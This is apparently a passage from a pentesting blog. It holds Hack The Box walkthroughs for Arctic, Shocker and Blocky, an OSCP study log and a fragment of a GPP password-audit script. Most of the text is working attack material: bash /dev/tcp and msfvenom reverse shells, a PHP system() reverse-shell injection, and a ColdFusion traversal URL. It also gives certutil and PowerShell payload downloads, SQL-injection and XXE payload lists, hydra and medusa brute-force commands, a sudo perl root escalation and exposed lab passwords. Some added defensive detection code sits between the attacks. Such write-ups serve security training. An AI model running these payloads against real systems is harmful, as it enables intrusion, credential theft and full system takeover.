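<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" image="2" changed="2019-01-28 23:12:48" uid="{CD450F70-CDB8-4948-B908-F8D038C59B6C}" userContext="0" removePolicy="0" policyApplied="1">
<Properties action="U" newName="" fullName="" description="" cpassword="CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="Administrator"></Properties></User></Groups>"""


def decode_cpassword(value: str) -> bytes:
    """GPP strips the base64 padding; restore it and return the raw AES-256-CBC ciphertext."""
    return base64.b64decode(value + "=" * (-len(value) % 4))


def audit_gpp_xml(data: bytes, path: str) -> List[Dict[str, object]]:
    """Report each element with a non-empty cpassword, without decrypting anything."""
    findings: List[Dict[str, object]] = []
    root = ET.fromstring(data)
    parents = {child: parent for parent in root.iter() for child in parent}
    for elem in root.iter():
        cpassword = elem.get("cpassword")
        if not cpassword:
            continue
        ciphertext = decode_cpassword(cpassword)
        account = next((elem.get(attr) for attr in ACCOUNT_ATTRS if elem.get(attr)), "")
        parent = parents.get(elem)
        findings.append({
            "file": path,
            "account": account,
            # The 'changed' stamp lives on the enclosing <User>/<Task>/... element.
            "changed": parent.get("changed", "") if parent is not None else "",
            "ciphertext_bytes": len(ciphertext),
            # A 16-byte multiple is a PKCS#7-padded UTF-16LE password under the published key.
            "decryptable_with_public_key": len(ciphertext) % 16 == 0,
        })
    return findings


def scan_tree(root_dir: str) -> List[Dict[str, object]]:
    """Walk a SYSVOL copy or C:\\ProgramData\\Microsoft\\Group Policy\\History for GPP files."""
    results: List[Dict[str, object]] = []
    for dirpath, _, filenames in os.walk(root_dir):
        for name in filenames:
            if name in GPP_FILES:
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    results.extend(audit_gpp_xml(fh.read(), full))
    return results


if __name__ == "__main__":
    for f in audit_gpp_xml(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(f"{f['file']}: account={f['account']} changed={f['changed']} "
              f"ciphertext={f['ciphertext_bytes']} bytes; delete the preference and rotate the password")
```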

Reference used: https://0xdf.gitlab.io/2019/06/22/htb-querier.html

HTB – Arctic

Today we are going to solve another CTF challenge, “Arctic”, which is categorised as a retired lab presented by Hack the Box for online penetration testing practice. Solving the challenges in this lab is not easy without some knowledge of vulnerability assessment. Let’s start and learn how to analyse a vulnerability in a network and then exploit it to retrieve the desired information.

Level: Intermediate

Task: find user.txt and root.txt file in the victim’s machine.

Since these labs are accessible online, they have static IPs. The IP of Arctic is 10.10.10.11, so let’s start with nmap port enumeration.

c:\Users\jacco>nmap -sC -sV 10.10.10.11
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-19 19:46 W. Europe Summer Time
Nmap scan report for 10.10.10.11
Host is up (0.033s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.40 seconds

Right off the bat port 8500 looks interesting. Let’s have a look in the browser.

8500

CFIDE

The administrator directory gives us a login for ColdFusion 8.

Login

Exploitation

After a quick search online we find that ColdFusion 8 is vulnerable to directory traversal. ColdFusion 8 also stores the administrator hash locally in a file called password.properties, so we can grab the administrator hash through the directory traversal with the following URL:

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

And we get this output in the browser.

[Screenshot: HASH]

So we have a hash of 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
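
As an added defensive example (not part of the original write-up), the code below shows how a server-side handler can map a user-supplied locale parameter to a file without being fooled by the two defects the request above relies on: the %00 null byte and ../ traversal. The locale directory is an assumed placeholder, not the real ColdFusion layout.

```python
import os
from urllib.parse import unquote, urlsplit

# Assumed directory for the locale files in this example; not the real ColdFusion layout.
LOCALE_DIR = "/opt/cf8/wwwroot/CFIDE/administrator/locale"


def resolve_locale(raw_param, locale_dir=LOCALE_DIR):
    """Map a user-controlled locale parameter to a file inside locale_dir.

    Returns the absolute path, or None when the value must be rejected.
    The two checks target exactly what the request above abuses:
      * a %00 NUL byte, which makes the native file layer stop reading the
        path early, so a suffix check sees 'en' while the OS opens the
        properties file;
      * '../' components, which walk out of the intended directory.
    """
    decoded = unquote(raw_param)            # the web layer decodes %00, %2e, %2f for us
    if "\x00" in decoded:
        return None                         # never pass a NUL-containing path to the OS
    # Collapse '.' and '..' components, then confirm we are still under locale_dir.
    candidate = os.path.normpath(os.path.join(locale_dir, decoded))
    if candidate == locale_dir or os.path.commonpath([locale_dir, candidate]) != locale_dir:
        return None
    return candidate


def audit_requests(urls, param="locale"):
    """Review request URLs (e.g. from an access log) and report the ones that
    resolve_locale would reject, with the reason. Returns (url, reason) tuples."""
    findings = []
    for url in urls:
        for pair in urlsplit(url).query.split("&"):
            name, _, value = pair.partition("=")
            if name != param:
                continue
            if "\x00" in unquote(value):
                findings.append((url, "null byte"))
            elif resolve_locale(value) is None:
                findings.append((url, "path traversal"))
    return findings
```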

Using hash-identifier we see the hash is most likely SHA-1.

root@kali:~/htb/arctic# hash-identifier
   #########################################################################
   #	 __  __ 		    __		 ______    _____	   #
   #	/\ \/\ \		   /\ \ 	/\__  _\  /\  _ `\	   #
   #	\ \ \_\ \     __      ____ \ \ \___	\/_/\ \/  \ \ \/\ \	   #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R #
   #							www.Blackploit.com #
   #						       Root@Blackploit.com #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03

Possible Hashs:
[+]  SHA-1

A quick Google search online yields the cracked password – happyday. Usually easiest to start here before firing up hashcat.

Inside the admin console there is an area under the Debugging & Logging category, Scheduled Tasks, that allows us to upload files.

[Screenshot: ADMIN]

The scheduled task setup gives us the ability to download a file from a web server and save the output locally. Under Mappings we can verify the CFIDE path, so we know where to save a shell.

[Screenshot: MAPPINGS]

At this point we need to generate a shell. We could upload a cfexec.cfm shell (located in /usr/share/webshells/cfm on Kali) to get command execution or we can get a full shell by uploading a JSP shell since ColdFusion will serve and run JSP files.

To generate a JSP shell, we use msfvenom and set our parameters accordingly.

root@kali:~/htb/arctic# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f raw > shell.jsp
Payload size: 1496 byte

Now that we have our shell created, let’s serve the file from Kali using Python’s SimpleHTTPServer:

root@kali:~/htb/arctic# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Inside the ColdFusion admin console we configure three parameters for the scheduled task.

  • Set the URL to our webserver hosting the JSP shell
  • Check the box for Save output to a file
  • Set File to C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

[Screenshot: TASK]

After submitting we run the task on demand under Actions, and we can see the 200 response on our Python HTTP server.

[Screenshot: TASKRUN]

Fire up a netcat listener and we can now browse to our shell at http://10.10.10.11:8500/CFIDE/shell.jsp

root@kali:~/htb/arctic# nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 49212
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>whoami & hostname
whoami & hostname
arctic\tolis
arctic

And we can grab the user.txt flag on tolis’ desktop.

Privilege Escalation

Tolis doesn’t seem to be an administrator on the system, so we will need to escalate. One of the first things I do for privilege escalation on Windows is grab system information, so that we can identify the OS and also see if it’s missing any patches.

C:\>systeminfo
systeminfo

Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00477-001-0000421-84900
Original Install Date:     22/3/2017, 11:09:45   
System Boot Time:          29/12/2017, 3:34:21   
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2600 Mhz
                           [02]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2600 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.024 MB
Available Physical Memory: 88 MB
Virtual Memory: Max Size:  2.048 MB
Virtual Memory: Available: 1.085 MB
Virtual Memory: In Use:    963 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.11

From here we identify that the box is running Server 2008 R2 and has no patches installed, according to the Hotfix(s) output. Great! Let’s see what exploits we can find. From here you can either Google, use Exploit-DB or searchsploit, or, for Windows, I like to use Windows Exploit Suggester, which makes life easy. I won’t go into details on how to use it; check the GitHub page for usage and what you can feed into it.

After looking through the output I found a few privilege escalation exploits that could work. I settled on looking into MS10-059.

https://www.exploit-db.com/exploits/14610/

The Exploit-DB download only contained source files and no compiled exe. For whatever reason the exploit has an alias name of Chimichurri, as referenced on Exploit-DB, so I also searched by that and was able to find a compiled exe on GitHub. Note that normally you want to compile things yourself, but I wasn’t able to do so without installing a ton of stuff, so I decided to forgo it. Based on the source code it looks like the exploit will send us a reverse shell when fed our IP address and desired port as parameters.

Once again we set up a Python HTTP server on Kali; to download the file to our target, a simple PowerShell script will do the trick.

C:\ColdFusion8>echo $webclient = New-Object System.Net.WebClient >>wget.ps1

C:\ColdFusion8>echo $url = "http://10.10.14.10/chimichurri.exe" >>wget.ps1

C:\ColdFusion8>echo $file = "exploit.exe" >>wget.ps1

C:\ColdFusion8>echo $webclient.DownloadFile($url,$file) >>wget.ps1

C:\ColdFusion8>powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Alternatively, use certutil:

C:\ColdFusion8\runtime\bin>certutil -urlcache -split -f http://10.10.14.10/Chimichurri.exe chimichurri.exe
certutil -urlcache -split -f http://10.10.14.10/Chimichurri.exe chimichurri.exe
**** Online ****
000000 ...
017c00
CertUtil: -URLCache command completed successfully.

We verify the download, start a netcat listener, and run the exploit.

C:\ColdFusion8\runtime\bin>chimichurri.exe
chimichurri.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
C:\ColdFusion8\runtime\bin>chimichurri.exe 10.10.14.10 53
chimichurri.exe 10.10.14.10 53
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
C:\Users\jacco>nc -lvp 53
listening on [any] 53 ...
10.10.10.11: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 49897: NO_DATA
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\ColdFusion8\runtime\bin>whoami
whoami
nt authority\system

C:\ColdFusion8\runtime\bin>cd c:\users\administrator\desktop
cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>type root.txt
type root.txt
ce6*****b90

Author : Jacco Straathof

Reference used: https://www.absolomb.com/2017-12-29-HackTheBox-Arctic-Writeup/

OSCP Journey – 1st month

Date: 02 June – 30 june 2019
PDF: 380/380
Videos: 149/149
Exercises: 30/42
Exploited Machines: 10
Unlocked Networks: 0

The PDF contains 380 pages spread over 18 chapters. The videos’ total length is around 7 and a half hours, spread over 149 videos. I spent around 30 hours on the materials and exercises. There are five exercises that I decided to do later, since they require doing them on the correct machines in the lab. The videos and PDF fit together, but the videos seem outdated and have some differences from the PDF. If you encounter any issues while following the syntax in the course materials, use the syntax from the PDF.

Exploited Machines (18):

ALICE
ALPHA
BARRY
BETHANY
BOB
BRUCE
CORE
DJ
GAMMA
HELPDESK
HOTLINE
JD
KRAKEN
MAIL
MIKE
ORACLE
RALPH
TOPHAT

I finished the course materials and started attacking lab machines. I exploited 2 machines without using Metasploit.

My impression is that it simulates real-world scenarios. So far all the exploits are known exploits, and no puzzles or random guessing are needed. All you need is proper enumeration to spot the vulnerability.

The four hardest machines in the OSCP lab are known as The Big Four: Pain, Sufferance, Gh0st and Humble.

LEARNED:

root@kali:~/pwk# rlwrap nc -lvp 9090
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::9090
Ncat: Listening on 0.0.0.0:9090
Ncat: Connection from 192.168.1.139.
Ncat: Connection from 192.168.1.139:2675.
Microsoft Windows [Version 10.0.17134.885]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\PENTEST>whoami
whoami
LT-JACCO\jacco

COMMANDS:

root@kali:~/pwk# nmap -vv -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi 10.11.x.1-254

root@kali:~/pwk# gobuster -u http://10.11.x.x -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 25 -f -s 403

root@kali:~/pwk# dirb http://10.11.x.x/cgi-bin -X .cgi

root@kali:~/pwk# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.11.0.112/443 0>&1 " http://10.11.x.x:80/cgi-bin/admin.cgi

ATTACK FTP

ftp server:

medusa -h 10.11.1.8 -u justine -P /usr/share/wordlists/rockyou.txt -M ftp
hydra -L USER_LIST -P PASS_LIST -f -o /data/results/10.10.1.22/scans/10.10.1.22_21_ftphydra.txt -u 10.10.1.22 -s 21 ftp

BRUTE FORCE SSH

hydra -l justine -P /usr/share/wordlists/rockyou.txt -t 10 10.11.1.8 ssh -s 22
medusa -u root -P /usr/share/wordlists/rockyou.txt -e ns -h 10.10.1.22 -n 22 -M ssh

SQL INJECTION

sheet with the Burp Suite Intruder module. This list is an extended version of the SQL Login Bypass Cheat Sheet of Dr. Emin İslam Tatlı (OWASP Board Member).

root' --
root' #
root'/*
root' or '1'='1
root' or '1'='1'--
root' or '1'='1'#
root' or '1'='1'/*
root'or 1=1 or ''='
root' or 1=1
root' or 1=1--
root' or 1=1#
root' or 1=1/*
root') or ('1'='1
root') or ('1'='1'--
root') or ('1'='1'#
root') or ('1'='1'/*
root') or '1'='1
root') or '1'='1'--
root') or '1'='1'#
root') or '1'='1'/*
or 1=1
or 1=1--
or 1=1#
or 1=1/*
' or 1=1
' or 1=1--
' or 1=1#
' or 1=1/*
" or 1=1
" or 1=1--
" or 1=1#
" or 1=1/*
1234 ' AND 1=0 UNION ALL SELECT 'root', '81dc9bdb52d04dc20036dbd8313ed055
root" --
root" #
root"/*
root" or "1"="1
root" or "1"="1"--
root" or "1"="1"#
root" or "1"="1"/*
root" or 1=1 or ""="
root" or 1=1
root" or 1=1--
root" or 1=1#
root" or 1=1/*
root") or ("1"="1
root") or ("1"="1"--
root") or ("1"="1"#
root") or ("1"="1"/*
root") or "1"="1
root") or "1"="1"--
root") or "1"="1"#
root") or "1"="1"/*
XXE
<?xml version="1.0" encoding="UTF-8"?>

 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<root><name>&xxe;</name><tel>test</tel><email>&xxe;</email><password>tst</password></root>
LFI

See the source of any PHP file:

http://IP/index.php?m=php://filter/convert.base64-encode/resource=index

RFI

Null Bytes

http://10.11.1.24//classes/phpmailer/class.cs_phpmailer.php?classes_dir=/etc/passwd%00

curl -s --data "<?php system('bash -i >& /dev/tcp/172.16.237.245/4545 0>&1') ?>" "http://10.10.10.10/index.php?ACS_path=php://input%00"

BRUTE FORCE WEB

hydra 192.168.30.147 -l '' -P /usr/share/wordlists/fasttrack.txt -s 8080 http-form-post "/phpliteadmin.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect:H=Cookie: PHPSESSID=bq8vrl6updklfdvv21reb8s63j"

htaccess brute force

medusa -h 192.168.1.101 -u admin -P wordlist.txt -M http -m DIR:/admin -T 10

TIPS:

  • You MUST do the course materials and exercises; they are a gem. Even if you are already familiar with most of the topics, they serve as a refresher, and when you are attacking machines in the lab they will help you spot the “vulnerability” faster. I think it took around 30-50 hours to complete. Sparing the time at the beginning for this can save your day later in the lab.
  • In the course materials and exercises, some of the tools are outdated and have version issues with the Offsec Kali VM. If you encounter any issues, search for the problem on the Offsec forum. Most of them are known issues, and solutions are available there.
  • Don’t just sit idle waiting for the Nmap scan to finish. Make some guesses, like checking whether a web service is open using the browser, checking whether FTP, SSH or other common services are open using nc, and do some manual enumeration while waiting.
  • Nmap scripts are powerful tools for checking for vulnerabilities. Get familiar with them and play with the scripts. All of the scripts are located in the /usr/share/nmap/scripts/ directory.
  • Most public exploits won’t work without modification. They usually have hardcoded IP addresses and paths. Make sure you understand the exploit and change it as necessary.
  • When compiling an exploit, compile it in an environment (OS/kernel) as close as possible to the target machine. If the target machine doesn’t have a compiler, the workaround could be downloading the same OS as the target, installing it and compiling there, but that takes a lot of time. I found that some Vulnhub VMs similar to OSCP machines can be used to compile exploits too. I use Kioptrix machines to compile old exploits and it has worked so far, saving time on downloading and installing a new OS.
  • MSF is a powerful tool even though it is restricted in the exam. Use MSF for post-exploitation; it makes your life easier to upload and download files using a Meterpreter shell. It also has many post-exploitation modules that are really helpful.
  • For some of the straightforward machines, the methodology is simple: Nmap -> check the service or software version for known vulnerabilities (searchsploit or Google) -> read and understand the public exploit code -> make the necessary changes -> exploit.
  • Google anything that you find suspicious or anything that you don’t know at all.
  • Spare the time to write up each machine after you exploit it. It will make you understand your current methodology better and how to improve it. Someday you may encounter similar machines and it will help you. I use CherryTree for documenting everything.

Author: Jacco Straathof

HTB – Shocker

Today we are going to solve another CTF challenge, “Shocker”, which is a lab presented by Hack the Box for online penetration testing practice according to your experience level. HTB has two partitions of labs, i.e. Active and Retired; since we can’t submit write-ups of any Active lab, we have chosen the retired Shocker lab.

Level: Beginners

Task: find user.txt and root.txt file in the victim’s machine.

Let’s start with a basic nmap scan:

c:\Users\jacco>nmap -sC -sV 10.10.10.56
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-27 22:03 W. Europe Summer Time
Nmap scan report for 10.10.10.56
Host is up (0.031s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.04 seconds

Next, we use the dirb tool in Kali to enumerate directories and find some important entries such as /cgi-bin, index.html and server-status:

root@kali:~/htb/shocker# dirb http://10.10.10.56
-----------------
DIRB v2.22 
By The Dark Raver
-----------------
START_TIME: Tue May 28 12:56:05 2019
URL_BASE: http://10.10.10.56/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.56/ ----
+ http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294) 
+ http://10.10.10.56/index.html (CODE:200|SIZE:137) 
+ http://10.10.10.56/server-status (CODE:403|SIZE:299) 
-----------------
END_TIME: Tue May 28 12:58:24 2019
DOWNLOADED: 4612 - FOUND: 3

root@kali:~/htb/shocker# dirb http://10.10.10.56/cgi-bin -X .sh
-----------------
DIRB v2.22 
By The Dark Raver
-----------------
START_TIME: Tue May 28 13:02:27 2019
URL_BASE: http://10.10.10.56/cgi-bin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.sh) | (.sh) [NUM = 1]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.56/cgi-bin/ ----
+ http://10.10.10.56/cgi-bin/user.sh (CODE:200|SIZE:118) 
-----------------
END_TIME: Tue May 28 13:04:47 2019
DOWNLOADED: 4612 - FOUND: 1

root@kali:~/htb/shocker# curl http://10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain

Just an uptime test script

15:57:06 up 6:12, 0 users, load average: 0.00, 0.00, 0.00

Let’s run the Shellshock command against this file and see if we can pull a reverse shell. I looked across the internet to find the string that causes the Shellshock bug and whipped something together.

The command I used looked like this:

root@kali:~/htb/shocker# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.14/443 0>&1 " http://10.10.10.56:80/cgi-bin/user.sh

That invoked Shellshock, called a reverse shell to my netcat listener, and designated that it run against the file we found.

root@kali:~/htb/shocker# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.56.
Ncat: Connection from 10.10.10.56:39634.
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ id
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
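
As an added detection example (not from the original write-up), the function below scans Apache combined-format access log lines for the Shellshock trigger `() {` in the User-Agent or Referer fields, which is where the curl request above places it, and reports the client, the requested path and whether it hit a CGI script. The log lines are constructed for the demo.

```python
import re

# Constructed Apache combined-format lines for the demo; only lines 2 and 4 carry the trigger.
SAMPLE_LOG = """\
10.10.14.14 - - [28/May/2019:16:01:12 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.64.0"
10.10.14.14 - - [28/May/2019:16:01:30 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.14/443 0>&1 "
10.10.14.14 - - [28/May/2019:16:02:02 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0"
10.10.14.14 - - [28/May/2019:16:02:40 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "() {:;}; /usr/bin/id" "Mozilla/5.0"
"""

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)

# The bash function-import prefix: "()" followed by "{", with optional whitespace in between.
SHELLSHOCK = re.compile(r"\(\s*\)\s*\{")


def parse_line(line):
    """Split one combined-format line into its fields, or return None if it does not parse."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def find_shellshock(log_text):
    """Return one finding per log line whose User-Agent or Referer carries the trigger."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        request = entry["request"].split(" ")
        path = request[1] if len(request) > 1 else entry["request"]
        for field in ("user_agent", "referer"):
            if SHELLSHOCK.search(entry[field]):
                findings.append({
                    "client": entry["client"],
                    "time": entry["time"],
                    "path": path,
                    "field": field,
                    "value": entry[field],
                    # a hit on a CGI path is where the injected function actually executes
                    "cgi": path.startswith("/cgi-bin/"),
                })
                break
    return findings
```

A matching WAF or IDS rule is the same regex applied to every request header, not just these two, since any header a CGI wrapper exports as an environment variable is a candidate.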

We can also exploit this manually with the Python script from https://www.exploit-db.com/exploits/34900:

root@kali:~/htb/shocker# ./shellshock.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.3 lport=443 pages=/cgi-bin/user.sh
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.10.10.56
10.10.10.56> id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

10.10.10.56> ls 
user.sh

10.10.10.56> cd /home
10.10.10.56> ls
shelly

10.10.10.56> cd shelly
10.10.10.56> cat user.txt
2ec*****233

10.10.10.56> sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl

10.10.10.56> sudo /usr/bin/perl -e 'exec "/bin/sh"'
10.10.10.56> id
uid=0(root) gid=0(root) groups=0(root)

10.10.10.56> cat /root/root.txt
52c*****a467

Author: Jacco Straathof

HTB – Blocky

Today we are going to solve another CTF challenge, “Blocky”, which is available online for those who want to increase their penetration testing and black box testing skills. Blocky is a retired vulnerable lab presented by Hack the Box.

Level : Easy

Since these labs are available online, they have static IPs. The IP of Blocky is 10.10.10.37, so let’s begin with nmap port enumeration.

c:\Users\jacco>nmap -sC -sV 10.10.10.37
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-27 19:50 W. Europe Summer Time
Nmap scan report for 10.10.10.37
Host is up (0.030s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft &#8211; Under Construction!
8192/tcp closed sophos
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.67 seconds

Knowing port 80 is open on the victim’s network, I opened its IP in the browser but didn’t get any remarkable clue on the welcome page.

Next, we use wfuzz to enumerate directories and find some important ones such as /phpmyadmin, /wp-admin and /plugins, as the output below confirms.

c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt --hc=404 http://10.10.10.37/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.37/FUZZ
Total requests: 220551

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000003: C=200 313 L 3592 W 52256 Ch "# Copyright 2007 James Fisher"
000004: C=200 313 L 3592 W 52256 Ch "#"
000001: C=200 313 L 3592 W 52256 Ch "# directory-list-2.3-medium.txt"
000002: C=200 313 L 3592 W 52256 Ch "#"
000005: C=200 313 L 3592 W 52256 Ch ""
000181: C=301 9 L 28 W 309 Ch "wiki"
000232: C=301 9 L 28 W 315 Ch "wp-content"
000510: C=301 9 L 28 W 312 Ch "plugins"
000777: C=301 9 L 28 W 316 Ch "wp-includes"
001064: C=301 9 L 28 W 315 Ch "javascript"
007171: C=301 9 L 28 W 313 Ch "wp-admin"
010816: C=301 9 L 28 W 315 Ch "phpmyadmin"
013818: C=404

package com.myfirstplugin;

public class BlockyCore {
    public String sqlHost = "localhost";
    public String sqlUser = "root";
    public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";

    public BlockyCore() {}

    public void onServerStart() {}

    public void onServerStop() {}

    public void onPlayerJoin() {
        sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
    }

    public void sendMessage(String username, String message) {}
}

Then I explored http://10.10.10.37/phpmyadmin and logged into the phpMyAdmin server using the above credentials.

Then I opened the WordPress database to steal a username from there and found a user login, Notch, with user ID 1.

Now I try to access the victim’s system shell through SSH:

PS C:\Users\jacco> ssh notch@10.10.10.37
notch@10.10.10.37's password:8YsqfCTnvxAUeduzjNSXe22
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.

